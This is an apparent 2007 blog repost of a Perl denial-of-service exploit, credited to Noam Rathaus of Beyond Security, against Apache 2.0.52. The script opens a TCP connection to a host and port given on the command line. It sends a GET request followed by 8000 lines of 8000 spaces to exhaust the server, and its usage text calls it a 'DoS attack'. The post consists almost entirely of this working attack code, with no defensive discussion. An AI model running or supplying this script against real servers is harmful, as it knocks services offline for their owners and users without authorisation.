Apache 2.0.52 Multiple Space Header DoS

    [晴 May 17, 2007 10:35 | by ]
#!/usr/bin/perl
# Noam Rathaus of Beyond Security Ltd.
#

use strict;
use IO::Socket::INET;

usage() unless (@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";

$socket->autoflush(1);

print "Sending...\n";

print $socket "GET / HTTP/1.0\n";

for (my $count = 0; $count < 8000; $count++)
{
if ($count % 10 == 0)
{
 print ".";
}
print $socket (" "x8000)."\n";
}

print $socket "\n";

print "Done.\n";

while (<$socket>)
{
print $_;
}

close($socket);
exit(0);

sub usage
{
print "\nApache 2.0.52 8000x\" \" DoS attack\n";
print "\nUsage: apache_xpl.pl [host] [port]\n";
print "\n";
exit(1);
}
Tags: ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(10405)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive